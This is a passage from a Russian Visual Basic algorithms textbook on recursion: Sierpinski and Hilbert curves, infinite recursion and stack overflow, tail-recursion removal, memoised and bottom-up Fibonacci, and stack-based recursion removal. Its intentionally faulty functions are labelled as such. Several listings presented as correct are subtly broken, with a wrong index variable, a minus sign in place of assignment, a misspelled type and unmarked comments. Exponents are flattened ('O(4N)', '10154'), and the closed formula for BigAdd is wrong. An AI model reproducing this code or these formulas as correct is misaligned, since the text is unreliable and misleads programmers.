Например, для разбиения кривой типа A, первый диагональный отрезок разбивается на кривую типа A, за которой следует кривая типа B. Затем рисуется без изменений горизонтальный отрезок из исходной кривой типа A. Наконец, второй диагональный отрезок разбивается на кривую типа D, за которой следует кривая типа A. На рис. 5.7 показано, как кривая типа A второго порядка образуется из нескольких кривых 1 порядка. Подкривые изображены жирными линиями.
На рис. 5.8 показано, как полная кривая Серпинского 2 порядка образуется из 4 подкривых 1 порядка. Каждая из подкривых обведена контурной линией.
Можно использовать стрелки и для обозначения типа линий, соединяющих подкривые (тонкие линии на рис. 5.8), тогда можно будет изобразить рекурсивные отношения между четырьмя типами кривых так, как это показано на рис. 5.9.
@Рис. 5.6. Части кривой Серпинского
=====93
@Рис. 5.7. Разбиение кривой типа A
Все процедуры для построения подкривых Серпинского очень похожи, поэтому мы приводим здесь только одну из них. Соотношения на рис. 5.9 показывают, какие операции нужно выполнить для рисования кривых различных типов. Соотношения для кривой типа A реализованы в следующем коде. Вы можете использовать остальные соотношения, чтобы определить, какие изменения нужно внести в код для рисования кривых других типов.
Private Sub SierpA(Depth As Integer, Dist As Single)
If Depth = 1 Then
Line -Step(-Dist, Dist)
Line -Step(-Dist, 0)
Line -Step(-Dist, -Dist)
Else
SierpA Depth - 1, Dist
Line -Step(-Dist, Dist)
SierpB Depth - 1, Dist
Line -Step(-Dist, 0)
SierpD Depth - 1, Dist
Line -Step(-Dist, -Dist)
SierpA Depth - 1, Dist
End If
End Sub
@Рис. 5.8. Кривые Серпинского, образованные из меньших кривых Серпинского
=====94
@Рис. 5.9. Рекурсивные соотношения между кривыми Серпинского
Кроме процедур, которые рисуют каждую из основных кривых, потребуется еще процедура, которая по очереди вызывает их все для создания законченной кривой Серпинского.
Sub Sierpinski (Depth As Integer, Dist As Single)
SierpB Depth, Dist
Line -Step(Dist, Dist)
SierpC Depth, Dist
Line -Step(Dist, -Dist)
SierpD Depth, Dist
Line -Step(-Dist, -Dist)
SierpA Depth, Dist
Line -Step(-Dist, Dist)
End Sub
Анализ времени выполнения программы
Чтобы проанализировать время выполнения этого алгоритма, необходимо определить число вызовов для каждой из четырех процедур рисования кривых. Пусть T(N) — число вызовов любой из четырех основных подпрограмм основной процедуры Sierpinski при построении кривой порядка N.
Если порядок кривой равен 1, кривая каждого типа рисуется только один раз. Прибавив сюда основную процедуру, получим T(1) = 5.
При каждом рекурсивном вызове, процедура вызывает саму себя или другие процедуры четыре раза. Так как эти процедуры практически одинаковые, то T(N) будет одинаковым, независимо от того, какая процедура вызывается первой. Это обусловлено тем, что кривые Серпинского симметричны и содержат одно и то же число кривых разных типов. Рекурсивные уравнения для T(N) выглядят так:
T(1) = 5
T(N) = 1 + 4 * T(N-1) для N > 1.
Эти уравнения почти совпадают с уравнениями, которые использовались для оценки времени выполнения алгоритма, рисующего кривые Гильберта. Единственное отличие состоит в том, что для кривых Гильберта T(1) = 1. Сравнение значений этих уравнений показывает, что TSierpinski(N) = THilbert(N+1). В конце предыдущего раздела было показано, что THilbert(N) = (4N - 1) / 3, поэтому TSierpinski(N) = (4N+1 - 1) / 3, что также составляет O(4N).
=====95
Так же, как и алгоритм построения кривых Гильберта, этот алгоритм выполняется за время порядка O(4N), но это не так уж и плохо. Кривая Серпинского состоит из O(4N) линий, поэтому ни один алгоритм не может нарисовать кривую Серпинского быстрее, чем за время порядка O(4N).
Кривые Серпинского также полностью заполняют экран большинства компьютеров при порядке кривой, большем или равном 9. При какомто порядке, большем 9, вы столкнетесь с ограничениями языка Visual Basic и возможностей вашего компьютера, но, скорее всего, вы еще раньше будете ограничены предельным разрешением экрана.
Программа Sierp, показанная на рис. 5.10, использует этот рекурсивный алгоритм для рисования кривых Серпинского. При выполнении программы, задавайте вначале небольшую глубину рекурсии (меньше 6), до тех пор, пока вы не определите, насколько быстро выполняется эта программа на вашем компьютере.
Опасности рекурсии
Рекурсия может служить мощным методом разбиения больших задач на части, но она таит в себе несколько опасностей. В этом разделе мы пытаемся охватить некоторые из этих опасностей и объяснить, когда стоит и не стоит использовать рекурсию. В последующих разделах приводятся методы устранения от рекурсии, когда это необходимо.
Бесконечная рекурсия
Наиболее очевидная опасность рекурсии заключается в бесконечной рекурсии. Если неправильно построить алгоритм, то функция может пропустить условие остановки рекурсии и выполняться бесконечно. Проще всего совершить эту ошибку, если просто забыть о проверке условия остановки, как это сделано в следующей ошибочной версии функции факториала. Поскольку функция не проверяет, достигнуто ли условие остановки рекурсии, она будет бесконечно вызывать сама себя.
@Рис. 5.10 Программа Sierp
=====96
Private Function BadFactorial(num As Integer) As Integer
BadFactorial = num * BadFactorial (num - 1)
End Function
Функция также может вызывать себя бесконечно, если условие остановки не прекращает все возможные пути рекурсии. В следующей ошибочной версии функции факториала, функция будет бесконечно вызывать себя, если входное значение — не целое число, или если оно меньше 0. Эти значения не являются допустимыми входными значениями для функции факториала, поэтому в программе, которая использует эту функцию, может потребоваться проверка входных значений. Тем не менее, будет лучше, если функция выполнит эту проверку сама.
Private Function BadFactorial2(num As Double) As Double
If num = 0 Then
BadFactorial2 = 1
Else
BadFactorial2 = num * BadFactorial2(num-1)
End If
End Function
Следующая версия функции Fibonacci является более сложным примером. В ней условие остановки рекурсии прекращает выполнение только нескольких путей рекурсии, и возникают те же проблемы, что и при выполнении функции BadFactorial2, если входные значения отрицательные или не целые.
Private Function BadFib(num As Double) As Double
If num = 0 Then
BadFib = 0
Else
BadFib = BadPib(num - 1) + BadFib (num - 2)
End If
End Function
И последняя проблема, связанная с бесконечной рекурсией, заключается в том, что «бесконечная» на самом деле означает «до тех пор, пока не будет исчерпано стековое пространство». Даже корректно написанные рекурсивные процедуры будут иногда приводить к переполнению стека и аварийному завершению работы. Следующая функция, которая вычисляет сумму N + (N - 1) + … + 2 +1, приводит к исчерпанию стекового пространства при больших значениях N. Наибольшее возможное значение N, при котором программа еще будет работать, зависит от конфигурации вашего компьютера.
Private Function BigAdd(N As Double) As Double
If N <= 1 Then
BigAdd = 1
Else
BigAdd = N + BigAdd(N - 1)
End If
End Function
=====97
Программа BigAdd демонстрирует этот алгоритм. Проверьте, насколько большое входное значение вы можете ввести в этой программе до того, как наступит переполнение стека на вашем компьютере.
Потери памяти
Другая опасность рекурсии заключается в потерях памяти. При каждом вызове подпрограммы, система выделяет память для локальных переменных новой процедуры. Во время сложной последовательности рекурсивных вызовов, значительная часть времени и памяти компьютера будет уходить на выделение и освобождение памяти для этих переменных во время рекурсии. Даже если это не приведет к исчерпанию стекового пространства, время, потраченное на работу с переменными, может быть значительным.
Существует несколько способов уменьшения этих накладных расходов. Вопервых, не следует использовать большого количества ненужных переменных. Даже если подпрограмма не использует их, Visual Basic все равно будет отводить память под эти переменные. Следующая версия функции BigAdd еще быстрее приводит к переполнению стека, чем предыдущая.
Private Function BigAdd(N As Double) As Double
Dim I1 As Integer
Dim I2 As Integer
Dim I3 As Integer
Dim I4 As Integer
Dim I5 As Integer
If N <= 1 Then
BigAdd = 1
Else
BigAdd = N + BigAdd (N - 1)
End If
End Function
Если вы не уверены, нужна ли переменная, используйте оператор Option Explicit и закомментируйте определение переменной. При попытке выполнить программу, Visual Basic сообщит об ошибке, если переменная используется в программе.
Вы также можете уменьшить использование стека за счет применения глобальных переменных. Если вы определите переменные в секции Declarations модуля вместо того, чтобы определять их в подпрограмме, то системе не понадобится отводить память при каждом вызове подпрограммы.
Лучшим решением будет определение переменных в процедуре при помощи зарезервированного слова Static. Статические переменные используются совместно всеми экземплярами процедуры, и системе не нужно отводить память под новые копии переменных при каждом вызове подпрограммы.
Необоснованное применение рекурсии
Менее очевидной опасностью является необоснованное применение рекурсии. При этом использование рекурсии не является наилучшим способом решения задачи. Приведенные выше функции факториала, наибольшего общего делителя, чисел Фибоначчи и функции BigAdd не обязательно должны быть рекурсивными. Лучшие, не рекурсивные версии этих функций описываются позже в этой главе.
=====98
В случае факториала и наибольшего общего делителя, ненужная рекурсия является по большей части безвредной. Обе эти функции выполняются достаточно быстро для достаточно больших выходных значений. Их выполнение также не будет ограничено размером стека, если вы не использовали большую часть стекового пространства в других частях программы.
С другой стороны, применение рекурсии ухудшает алгоритм вычисления чисел Фибоначчи. Для вычисления Fib(N), алгоритм вначале вычисляет Fib(N - 1) и Fib(N - 2). Но для вычисления Fib(N - 1) он должен сначала вычислить Fib(N - 2) и Fib(N - 3). При этом Fib(N - 2) вычисляется дважды.
Предыдущий анализ этого алгоритма показал, что Fib(1) и Fib(0) вычисляются Fib(N + 1) раз во время вычисления Fib(N). Так как Fib(30) = 832.040 то, чтобы вычислить Fib(29), приходится вычислять одни и те же значения Fib(0) и Fib(1) 832.040 раз. Алгоритм вычисления чисел Фибоначчи тратит огромное количество времени на вычисление этих промежуточных значений снова и снова.
В функции BigAdd существует другая проблема. Хотя она выполняется быстро, она приводит к большой глубине вложенности рекурсии, и очень быстро приводит к исчерпанию стекового пространства. Если бы не переполнение стека, то эта функция могла бы вычислять результаты для больших входных значений.
Похожая проблема существует и в функции факториала. Для входного значения N глубина рекурсии для факториала и функции BigAdd равна N. Функция факториала не может быть вычислена для таких больших входных значений, которые допустимы для функции BigAdd. Максимальное значение факториала, которое может уместиться в переменной типа double, равно 170! 7,257E+306, поэтому это наибольшее значение, которое может вычислить эта функция. Хотя эта функция приводит к глубокой рекурсии, она вызывает переполнение до того, как наступит переполнение стека.
Когда нужно использовать рекурсию
Эти рассуждения могут заставить вас думать, что рекурсия всегда нежелательна. Но это определенно не так. Многие алгоритмы являются рекурсивными по своей природе. И хотя любой алгоритм можно переписать так, чтобы он не содержал рекурсии, многие алгоритмы сложнее понимать, анализировать, отлаживать и поддерживать, если они написаны нерекурсивно.
В следующих разделах приведены методы устранения рекурсии из любого алгоритма. Некоторые из полученных нерекурсивных алгоритмов также просты в понимании. Функции, вычисляющие без применения рекурсии факториал, наибольший общий делитель, числа Фибоначчи, и функцию BigAdd, относительно просты.
С другой стороны, нерекурсивные версии алгоритмов построений кривых Гильберта и Серпинского намного сложнее. Их труднее понять, поддерживать, и они даже выполняются немного медленнее, чем рекурсивные версии. Они приведены лишь для того, чтобы продемонстрировать методы, которые вы можете использовать для устранения рекурсии из сложных алгоритмов, а не потому, что они лучше, чем рекурсивные версии соответствующих алгоритмов.
Если алгоритм рекурсивен по природе, записывайте его с использованием рекурсии. В лучшем случае, вы не встретитесь ни одной из описанных проблем. Если же вы столкнетесь с некоторыми из них, вы сможете переписать алгоритм без использования рекурсии при помощи методов, представленных в следующих разделах. Переписать алгоритм часто гораздо проще, чем с самого начала написать его без применения рекурсии.
======99
Хвостовая рекурсия
Вспомним представленные ранее функции для вычисления факториалов и наибольшего общего делителя, а также функцию BigAdd, которая приводит к переполнению стека даже для относительно небольших входных значений.
Private Function Factorial(num As Integer) As Integer
If num <= 0 Then
Factorial = 1
Else
Factorial = num * Factorial(num - 1)
End If
End Function
Private Function GCD(A As Integer, B As Integer) As Integer
If B Mod A = 0 Then
GCD = A
Else
GCD = GCD(B Mod A, A)
End If
End Function
Private Function BigAdd(N As Double) As Double
If N <= 1 Then
BigAdd = 1
Else
BigAdd = N + BigAdd(N - 1)
End If
End Function
Во всех этих функциях, последнее действие перед завершением функции — это рекурсивный шаг. Этот тип рекурсии в конце процедуры называется хвостовой рекурсией (tail recursion или end recursion).
Так как после рекурсии в процедуре ничего не происходит, существует простой способ ее устранения. Вместо рекурсивного вызова функции, процедура сбрасывает свои параметры, устанавливая те, которые бы она получила при рекурсивном вызове, и затем выполняется снова.
Рассмотрим общий случай рекурсивной процедуры:
Private Sub Recurse(A As Integer)
' Выполняются какиелибо действия, вычисляется B, и т.д.
Recurse B
End Sub
======100
Эту процедуру можно переписать без рекурсии как:
Private Sub NoRecurse(A As Integer)
Do While (not done)
' Выполняются какиелибо действия, вычисляется B, и т.д.
A = B
Loop
End Sub
Эта процедура называется устранением хвостовой рекурсии (tail recursion removal или end recursion removal). Этот прием не изменяет время выполнения программы. Рекурсивные шаги просто заменяются проходами в цикле While.
Устранение хвостовой рекурсии, тем не менее, устраняет вызовы подпрограмм, и поэтому может увеличить скорость работы алгоритма. Что более важно, этот метод также уменьшает использование стека. Алгоритмы типа функции BigAdd, которые ограничены глубиной рекурсии, могут от этого значительно выиграть.
Некоторые компиляторы автоматически устраняют хвостовую рекурсию, но компилятор Visual Basic этого не делает. В противном случае, функция BigAdd, приведенная в предыдущем разделе, не приводила бы к переполнению стека.
Используя устранение хвостовой рекурсии, легко переписать функции факториала, наибольшего общего делителя, и BigAdd без рекурсии. Эти версии используют зарезервированное слово ByVal для сохранения значений своих параметров для вызывающей процедуры.
Private Function Factorial(ByVal N As Integer) As Double
Dim value As Double
value = 1# ' Это будет значением функции.
Do While N > 1
value = value * N
N = N - 1 ' Подготовить аргументы для "рекурсии".
Loop
Factorial = value
End Function
Private Function GCD(ByVal A As Double, ByVal B As Double) As Double
Dim B_Mod_A As Double
B_Mod_A = B Mod A
Do While B_Mod_A <> 0
' Подготовить аргументы для "рекурсии".
B = A
A = B_Mod_A
B_Mod_A = B Mod A
Loop
GCD = A
End Function
Private Function BigAdd(ByVal N As Double) As Double
Dim value As Double
value = 1# ' ' Это будет значением функции.
Do While N > 1
value = value + N
N = N - 1 ' подготовить параметры для "рекурсии".
Loop
BigAdd = value
End Function
=====101
Для алгоритмов вычисления факториала и наибольшего общего делителя практически не существует разницы между рекурсивной и нерекурсивной версиями. Обе версии выполняются достаточно быстро, и обе они могут оперировать задачами большой размерности.
Для функции BigAdd, тем не менее, разница огромна. Рекурсивная версия приводит к переполнению стека даже для довольно небольших входных значений. Поскольку нерекурсивная версия не использует стек, она может вычислять результат для значений N вплоть до 10154. После этого наступит переполнение для данных типа double. Конечно, выполнение 10154 шагов алгоритма займет очень много времени, поэтому возможно вы не станете проверять этот факт сами. Заметим также, что значение этой функции совпадает со значением более просто вычисляемой функции N * N(N + 1) / 2.
Программы Facto2, GCD2 и BigAdd2 демонстрируют эти нерекурсивные алгоритмы.
Нерекурсивное вычисление чисел Фибоначчи
К сожалению, нерекурсивный алгоритм вычисления чисел Фибоначчи не содержит только хвостовую рекурсию. Этот алгоритм использует два рекурсивных вызова для вычисления значения, и второй вызов следует после завершения первого. Поскольку первый вызов не находится в самом конце функции, то это не хвостовая рекурсия, и от ее нельзя избавиться, используя прием устранения хвостовой рекурсии.
Это может быть связано и с тем, что ограничение рекурсивного алгоритма вычисления чисел Фибоначчи связано с тем, что он вычисляет слишком много промежуточных значений, а не глубиной вложенности рекурсии. Устранение хвостовой рекурсии уменьшает глубину рекурсии, но оно не изменяет время выполнения алгоритма. Даже если бы устранение хвостовой рекурсии было бы применимо к алгоритму вычисления чисел Фибоначчи, этот алгоритм все равно остался бы чрезвычайно медленным.
Проблема этого алгоритма в том, что он многократно вычисляет одни и те же значения. Значения Fib(1) и Fib(0) вычисляются Fib(N + 1) раз, когда алгоритм вычисляет Fib(N). Для вычисления Fib(29), алгоритм вычисляет одни и те же значения Fib(0) и Fib(1) 832.040 раз.
Поскольку алгоритм многократно вычисляет одни и те же значения, следует найти способ избежать повторения вычислений. Простой и конструктивный способ сделать это — построить таблицу вычисленных значений. Когда понадобится промежуточное значение, можно будет взять его из таблицы, вместо того, чтобы вычислять его заново.
=====102
В этом примере можно создать таблицу для хранения значений функции Фибоначчи Fib(N) для N, не превосходящих 1477. Для N >= 1477 происходит переполнение переменных типа double, используемых в функции. Следующий код содержит измененную таким образом функцию, вычисляющую числа Фибоначчи.
Const MAX_FIB = 1476 ' Максимальное значение.
Dim FibValues(0 To MAX_FIB) As Double
Private Function Fib(N As Integer) As Double
' Вычислить значение, если оно не находится в таблице.
If FibValues(N) < 0 Then _
FibValues(M) = Fib(N - 1) + Fib(N - 2)
Fib = FibValues(N)
End Function
При запуске программы, она присваивает каждому элементу в массиве FibValues значение -1. Затем она присваивает FibValues(0) значение 0, и FibValues(1) — значение 1. Это условия остановки рекурсии.
При выполнении функции, она проверяет, находится ли уже в массиве значение, которое ей требуется. Если его там нет, она, как и раньше, рекурсивно вычисляет это значение и сохраняет его в массиве для дальнейшего использования.
Программа Fibo2 использует этот метод для вычисления чисел Фибоначчи. Программа может быстро вычислить Fib(N) для N до 100 или 200. Но если вы попытаетесь вычислить Fib(1476), то программа выполнит последовательность рекурсивных вызовов глубиной 1476 уровней, которая вероятно переполнит стек вашей системы.
Тем не менее, по мере того, как программа вычисляет новые значения, она заполняет массив FibValues. Значения из массива позволяют функции вычислять все большие и большие значения без глубокой рекурсии. Например, если вычислить последовательно Fib(100), Fib(200), Fib(300), и т.д. то, в конце концов, можно будет заполнить массив значений FibValues и вычислить максимальное возможно значение Fib(1476).
Процесс медленного заполнения массива FibValues приводит к новому методу вычисления чисел Фибоначчи. Когда программа инициализирует массив FibValues, она может заранее вычислить все числа Фибоначчи.
Private Sub InitializeFibValues()
Dim i As Integer
FibValues(0) = 0 ' Инициализация условий остановки.
FibValues(1) = 1
For i = 2 To MAX_FIB
FibValues(i) = FibValues(i - 1) + FibValues(i - 2)
Next i
End Sub
Private Function Fib(N As Integer) As Duble
Fib - FibValues(N)
End Function
=====104
Определенное время в этом алгоритме занимает составление массива с табличными значениями. Но после того как массив создан, для получения элемента из массива требуется всего один шаг. Ни процедура инициализации, ни функция Fib не используют рекурсию, поэтому ни одна из них не приведет к исчерпанию стекового пространства. Программа Fibo3 демонстрирует этот подход.
Стоит упомянуть еще один метод вычисления чисел Фибоначчи. Первое рекурсивное определение функции Фибоначчи использует подход сверху вниз. Для получения значения Fib(N), алгоритм рекурсивно вычисляет Fib(N - 1) и Fib(N - 2) и затем складывает их.
Подпрограмма InitializeFibValues, с другой стороны, работает снизу вверх. Она начинает со значений Fib(0) и Fib(1). Она затем использует меньшие значения для вычисления больших, до тех пор, пока таблица не заполнится.
Вы можете использовать тот же подход снизу вверх для прямого вычисления значений функции Фибоначчи каждый раз, когда вам потребуется значение. Этот метод требует больше времени, чем выборка значений из массива, но не требует дополнительной памяти для таблицы значений. Это пример пространственновременного компромисса. Использование большего объема памяти для хранения таблицы значений делает выполнение алгоритма более быстрым.
Private Function Fib(N As Integer) As Double
Dim Fib_i_minus_1 As Double
Dim Fib_i_minus_2 As Double
Dim fib_i As Double
Dim i As Integer
If N <= 1 Then
Fib = N
Else
Fib_i_minus_2 = 0 ' Вначале Fib(0)
Fib_i_minus_1 = 1 ' Вначале Fib(1)
For i = 2 To N
fib_i = Fib_i_minus_1 + Fib_i_minus_2
Fib_i_minus_2 = Fib_i_minus_1
Fib_i_minus_1 = fib_i
Next i
Fib = fib_i
End If
End Function
Этой версии требуется порядка O(N) шагов для вычисления Fib(N). Это больше, чем один шаг, который требовался в предыдущей версии, но намного быстрее, чем O(Fib(N)) шагов в исходной версии алгоритма. На компьютере с процессором Pentium с тактовой частотой 90 МГц, исходному рекурсивному алгоритму потребовалось почти 52 секунды для вычисления Fib(32) = 2.178.309. Время вычисления Fib(1476) 1,31E+308 при помощи нового алгоритма пренебрежимо мало. Программа Fibo4 использует этот метод для вычисления чисел Фибоначчи.
=====105
Устранение рекурсии в общем случае
Функции факториала, наибольшего общего делителя, и BigAdd можно упростить устранением хвостовой рекурсии. Функцию, вычисляющую числа Фибоначчи, можно упростить, используя таблицу значений или переформулировав задачу с использованием подхода снизу вверх.
Некоторые рекурсивные алгоритмы настолько сложны, то применение этих методов затруднено или невозможно. Достаточно сложно было бы написать нерекурсивный алгоритм для построения кривых Гильберта или Серпинского с нуля. Другие рекурсивные алгоритмы более просты.
Ранее было показано, что алгоритм, который рисует кривые Гильберта или Серпинского, должен включать порядка O(N4) шагов, так что исходные рекурсивные версии достаточно хороши. Они достигают почти максимальной возможной производительности при приемлемой глубине рекурсии.
Тем не менее, встречаются другие сложные алгоритмы, которые имеют высокую глубину вложенности рекурсии, но к которым неприменимо устранение хвостовой рекурсии. В этом случае, все еще возможно преобразование рекурсивного алгоритма в нерекурсивный.
Основной подход при этом заключается в том, чтобы рассмотреть порядок выполнения рекурсии на компьютере и затем попытаться сымитировать шаги, выполняемые компьютером. Затем новый алгоритм будет сам осуществлять «рекурсию» вместо того, чтобы всю работу выполнял компьютер.
Поскольку новый алгоритм выполняет практически те же шаги, что и компьютер, можно поинтересоваться, возрастет ли скорость вычислений. В Visual Basic это обычно не выполняется. Компьютер может выполнять задачи, которые требуются при рекурсии, быстрее, чем вы можете их имитировать. Тем не менее, оперирование этими деталями самостоятельно обеспечивает лучший контроль над выделением памяти под локальные переменные, и позволяет избежать глубокого уровня вложенности рекурсии.
Обычно, при вызове подпрограммы, система выполняет три вещи. Вопервых, сохраняет данные, которые нужны ей для продолжения выполнения после завершения подпрограммы. Вовторых, она проводит подготовку к вызову подпрограммы и передает ей управление. Втретьих, когда вызываемая процедура завершается, система восстанавливает данные, сохраненные на первом шаге, и передает управление назад в соответствующую точку программы. Если вы преобразуете рекурсивную процедуру в нерекурсивную, вам приходится выполнять эти три шага самостоятельно.
Рассмотрим следующую обобщенную рекурсивную процедуру:
Sub Subr(num)
<1 блок кода>
Subr(<параметры>)
<2 блок кода>
End Sub
Поскольку после рекурсивного шага есть еще операторы, вы не можете использовать устранение хвостовой рекурсии для этого алгоритма.
=====105
Вначале пометим первые строки в 1 и 2 блоках кода. Затем эти метки будут использоваться для определения места, с которого требуется продолжить выполнение при возврате из «рекурсии». Эти метки используются только для того, чтобы помочь вам понять, что делает алгоритм — они не являются частью кода Visual Basic. В этом примере метки будут выглядеть так:
Sub Subr(num)
1 <1 блок кода>
Subr(<параметры>)
2 <2 блок кода>
End Sub
Используем специальную метку «0» для обозначения конца «рекурсии». Теперь можно переписать процедуру без использования рекурсии, например, так:
Sub Subr(num)
Dim pc As Integer ' Определяет, где нужно продолжить рекурсию.
pc = 1 ' Начать сначала.
Do
Select Case pc
Case 1
<1 блок кода>
If (достигнуто условие остановки) Then
' Пропустить рекурсию и перейти к блоку 2.
pc = 2
Else
' Сохранить переменные, нужные после рекурсии.
' Сохранить pc = 2. Точка, с которой продолжится
' выполнение после возврата из "рекурсии".
' Установить переменные, нужные для рекурсии.
' Например, num = num - 1.
:
' Перейти к блоку 1 для начала рекурсии.
pc = 1
End If
Case 2 ' Выполнить 2 блок кода
<2 блок кода>
pc = 0
Case 0
If (это последняя рекурсия) Then Exit Do
' Иначе восстановить pc и другие переменные,
' сохраненные перед рекурсией.
End Select
Loop
End Sub
======106
Переменная pc, которая соответствует счетчику программы, сообщает процедуре, какой шаг она должна выполнить следующим. Например, при pc = 1, процедура должна выполнить 1 блок кода.
Когда процедура достигает условия остановки, она не выполняет рекурсию. Вместо этого, она присваивает pc значение 2, и продолжает выполнение 2 блока кода.
Если процедура не достигла условия остановки, она выполняет «рекурсию». Для этого она сохраняет значения всех локальных переменных, которые ей понадобятся позже после завершения «рекурсии». Она также сохраняет значение pc для участка кода, который она будет выполнять после завершения «рекурсии». В этом примере следующим выполняется 2 блок кода, поэтому она сохраняет 2 в качестве следующего значения pc. Самый простой способ сохранения значений локальных переменных и pc состоит в использовании стеков, подобных тем, которые описывались в 3 главе.
Реальный пример поможет вам понять эту схему. Рассмотрим слегка измененную версию функции факториала. В нем переписана только подпрограмма, которая возвращает свое значение при помощи переменной, а не функции, для упрощения работы.
Private Sub Factorial(num As Integer, value As Integer)
Dim partial As Integer
1 If num <= 1 Then
value = 1
Else
Factorial(num - 1, partial)
2 value = num * partial
End If
End Sub
После возврата процедуры из рекурсии, требуется узнать исходное значение переменной num, чтобы выполнить операцию умножения value = num * partial. Поскольку процедуре требуется доступ к значению num после возврата из рекурсии, она должна сохранять значение переменных pc и num до начала рекурсии.
Следующая процедура сохраняет эти значения в двух стеках на основе массивов. При подготовке к рекурсии, она проталкивает значения переменных num и pc в стеки. После завершения рекурсии, она выталкивает добавленные последними значения из стеков. Следующий код демонстрирует нерекурсивную версию подпрограммы вычисления факториала.
Private Sub Factorial(num As Integer, value As Integer)
ReDim num_stack(1 to 200) As Integer
ReDim pc_stack(1 to 200) As Integer
Dim stack_top As Integer ' Вершина стека.
Dim pc As Integer
pc = 1
Do
Select Case pc
Case 1
If num <= 1 Then ' Это условие остановки. value = 1
pc = 0 ' Конец рекурсии.
Else ' Рекурсия.
' Сохранить num и следующее значение pc.
stack_top = stack_top + 1
num_stack(stack_top) = num
pc_stack(stack_top) = 2 ' Возобновить с 2.
' Начать рекурсию.
num = num - 1
' Перенести блок управления в начало.
pc = 1
End If
Case 2
' value содержит результат последней
' рекурсии. Умножить его на num.
value = value * num
' "Возврат" из "рекурсии".
pc = 0
Case 0
' Конец "рекурсии".
' Если стеки пусты, исходный вызов
' подпрограммы завершен.
If stack_top <= 0 Then Exit Do
' Иначе восстановить локальные переменные и pc.
num = num_stack(stack_top)
pc = pc_stack(stack_top)
stack_top = stacK_top - 1
End Select
Loop
End Sub
Так же, как и устранение хвостовой рекурсии, этот метод имитирует поведение рекурсивного алгоритма. Процедура заменяет каждый рекурсивный вызов итерацией цикла While. Поскольку число шагов остается тем же самым, полное время выполнения алгоритма не изменяется.
Так же, как и в случае с устранением хвостовой рекурсии, этот метод устраняет глубокую рекурсию, которая может переполнить стек.
Нерекурсивное построение кривых Гильберта
Пример вычисления факториала из предыдущего раздела превратил простую, но неэффективную рекурсивную функцию вычисления факториала в сложную и неэффективную нерекурсивную процедуру. Намного лучший нерекурсивный алгоритм вычисления факториала, был представлен ранее в этой главе.
=======107-108
Может оказаться достаточно трудно найти простую нерекурсивную версию для более сложных алгоритмов. Методы из предыдущего раздела могут быть полезны, если алгоритм содержит многократную или косвенную рекурсию.
В качестве более интересного примера, рассмотрим нерекурсивный алгоритм построения кривых Гильберта.
Private Sub Hilbert(depth As Integer, Dx As Single, Dy As Single)
If depth > 1 Then Hilbert depth - 1, Dy, Dx
HilbertPicture.Line -Step(Dx, Dy)
If depth > 1 Then Hilbert depth - 1, Dx, Dy
HilbertPicture.Line -Step(Dy, Dx)
If depth > 1 Then Hilbert depth - 1, Dx, Dy
HilbertPicture.Line -Step(-Dx, -Dy)
If depth > 1 Then Hilbert depth - 1, -Dy, -Dx
End Sub
В следующем фрагменте кода первые строки каждого блока кода между рекурсивными шагами пронумерованы. Эти блоки включают первую строку процедуры и любые другие точки, в которых может понадобиться продолжить выполнение после возврата после «рекурсии».
Private Sub Hilbert(depth As Integer, Dx As Single, Dy As Single)
1 If depth > 1 Then Hilbert depth - 1, Dy, Dx
2 HilbertPicture.Line -Step(Dx, Dy)
If depth > 1 Then Hilbert depth - 1, Dx, Dy
3 HilbertPicture.Line -Step(Dy, Dx)
If depth > 1 Then Hilbert depth - 1, Dx, Dy
4 HilbertPicture.Line -Step(-Dx, -Dy)
If depth > 1 Then Hilbert depth - 1, -Dy, -Dx
End Sub
Каждый раз, когда нерекурсивная процедура начинает «рекурсию», она должна сохранять значения локальных переменных Depth, Dx, и Dy, а также следующее значение переменной pc. После возврата из «рекурсии», она восстанавливает эти значения. Для упрощения работы, можно написать пару вспомогательных процедур для заталкивания и выталкивания этих значений из нескольких стеков.
====109
Const STACK_SIZE =20
Dim DepthStack(0 To STACK_SIZE)
Dim DxStack(0 To STACK_SIZE)
Dim DyStack(0 To STACK_SIZE)
Dim PCStack(0 To STACK_SIZE)
Dim TopOfStack As Integer
Private Sub SaveValues (Depth As Integer, Dx As Single, _
Dy As Single, pc As Integer)
TopOfStack = TopOfStack + 1
DepthStack(TopOfStack) = Depth
DxStack(TopOfStack) = Dx
DyStack(TopOfStack) = Dy
PCStack(TopOfStack) = pc
End Sub
Private Sub RestoreValues (Depth As Integer, Dx As Single, _
Dy As Single, pc As Integer)
Depth = DepthStack(TopOfStack)
Dx = DxStack(TopOfStack)
Dy = DyStack(TopOfStack)
pc = PCStack(TopOfStack)
TopOfStack = TopOfStack - 1
End Sub
Следующий код демонстрирует нерекурсивную версию подпрограммы Hilbert.
Private Sub Hilbert(Depth As Integer, Dx As Single, Dy As Single)
Dim pc As Integer
Dim tmp As Single
pc = 1
Do
Select Case pc
Case 1
If Depth > 1 Then ' Рекурсия.
' Сохранить текущие значения.
SaveValues Depth, Dx, Dy, 2
' Подготовиться к рекурсии.
Depth = Depth - 1
tmp = Dx
Dx = Dy
Dy = tmp
pc = 1 ' Перейти в начало рекурсивного вызова.
Else ' Условие остановки.
' Достаточно глубокий уровень рекурсии.
' Продолжить со 2 блоком кода.
pc = 2
End If
Case 2
HilbertPicture.Line -Step(Dx, Dy)
If Depth > 1 Then ' Рекурсия.
' Сохранить текущие значения.
SaveValues Depth, Dx, Dy, 3
' Подготовиться к рекурсии.
Depth = Depth - 1
' Dx и Dy остаются без изменений.
pc = 1 Перейти в начало рекурсивного вызова.
Else ' Условие остановки.
' Достаточно глубокий уровень рекурсии.
' Продолжить с 3 блоком кода.
pc = 3
End If
Case 3
HilbertPicture.Line -Step(Dy, Dx)
If Depth > 1 Then ' Рекурсия.
' Сохранить текущие значения.
SaveValues Depth, Dx, Dy, 4
' Подготовиться к рекурсии.
Depth = Depth - 1
' Dx и Dy остаются без изменений.
pc = 1 Перейти в начало рекурсивного вызова.
Else ' Условие остановки.
' Достаточно глубокий уровень рекурсии.
' Продолжить с 4 блоком кода.
pc = 4
End If
Case 4
HilbertPicture.Line -Step(-Dx, -Dy)
If Depth > 1 Then ' Рекурсия.
' Сохранить текущие значения.
SaveValues Depth, Dx, Dy, 0
' Подготовиться к рекурсии.
Depth = Depth - 1
tmp = Dx
Dx = -Dy
Dy = -tmp
pc = 1 Перейти в начало рекурсивного вызова.
Else ' Условие остановки.
' Достаточно глубокий уровень рекурсии.
' Конец этого рекурсивного вызова.
pc = 0
End If
Case 0 ' Возврат из рекурсии.
If TopOfStack > 0 Then
RestoreValues Depth, Dx, Dy, pc
Else
' Стек пуст. Выход.
Exit Do
End If
End Select
Loop
End Sub
======111
